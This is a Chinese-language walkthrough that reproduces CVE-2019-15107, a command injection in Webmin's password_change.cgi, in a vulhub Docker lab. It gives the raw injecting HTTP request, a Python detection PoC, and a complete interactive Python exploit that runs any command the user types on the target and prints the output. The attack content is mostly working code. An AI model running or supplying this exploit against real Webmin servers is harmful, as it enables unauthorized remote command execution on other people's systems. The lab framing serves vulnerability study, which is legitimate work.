环境搭建:
使用vulhub,进入对应文件夹启动环境:
[root@localhost CVE-2019-15107]# cd /home/vulhub/webmin/CVE-2019-15107/
[root@localhost CVE-2019-15107]# docker-compose up -d
查看端口:
[root@localhost CVE-2019-15107]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
a6c80145477b vulhub/webmin:1.910 "/docker-entrypoint.…" 6 minutes ago Up 6 minutes 0.0.0.0:10000->10000/tcp, :::10000->10000/tcp cve-2019-15107_web_1
漏洞复现:
执行完成后,访问https://your-ip:10000,忽略证书后即可看到webmin的登录页面。
参考链接中的数据包是不对的,经过阅读代码可知,只有在发送的user参数的值不是已知Linux用户的情况下(而参考链接中是user=root),才会进入到修改/etc/shadow的地方,触发命令注入漏洞。
发送如下数据包,即可执行命令id:
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=wwwq&pam=&expired=2&old=test|id&new1=test2&new2=test2
POC编写:
import requests
requests.packages.urllib3.disable_warnings() #去除告警
url = "https://192.168.10.10:10000/password_change.cgi"
headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": f"{url}", "Content-Type": "application/x-www-form-urlencoded"}
data = {"user": "wwwq", "pam": '', "expired": "2", "old": "test|echo wwwq|md5sum", "new1": "test2", "new2": "test2"}
# data 中执行的 echo wwwq|md5sum 命令
res = requests.post(url, data=data,headers=headers, verify=False)
if "c0f07f528bbb4eed25c97370610a7c8e" in res.text: # wwwq 的 md5 值
print("CVE-2019-15107 存在")
pycharm运行结果:
EXP编写:
import requests,re
requests.packages.urllib3.disable_warnings() #去除告警
url = "https://192.168.10.10:10000/password_change.cgi"
headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": f"{url}", "Content-Type": "application/x-www-form-urlencoded"}
data = {"user": "wwwq", "pam": '', "expired": "2", "old": "test|echo wwwq|md5sum", "new1": "test2", "new2": "test2"}
# data 中执行的 echo wwwq|md5sum 命令
res = requests.post(url, data=data,headers=headers, verify=False)
if "c0f07f528bbb4eed25c97370610a7c8e" in res.text: # wwwq 的 md5 值
print("CVE-2019-15107 存在")
while 1 :
data["old"] = "test|" + input("请输入你要执行的命令:") # 输入要执行的命令且替换 data 中的执行的命令
exp_res = requests.post(url, data=data,headers=headers, verify=False)
rce_res = re.findall("incorrect([\s\S]*)</h3>",exp_res.text) # 正则提取结果
print(rce_res[0])
pycharm运行结果: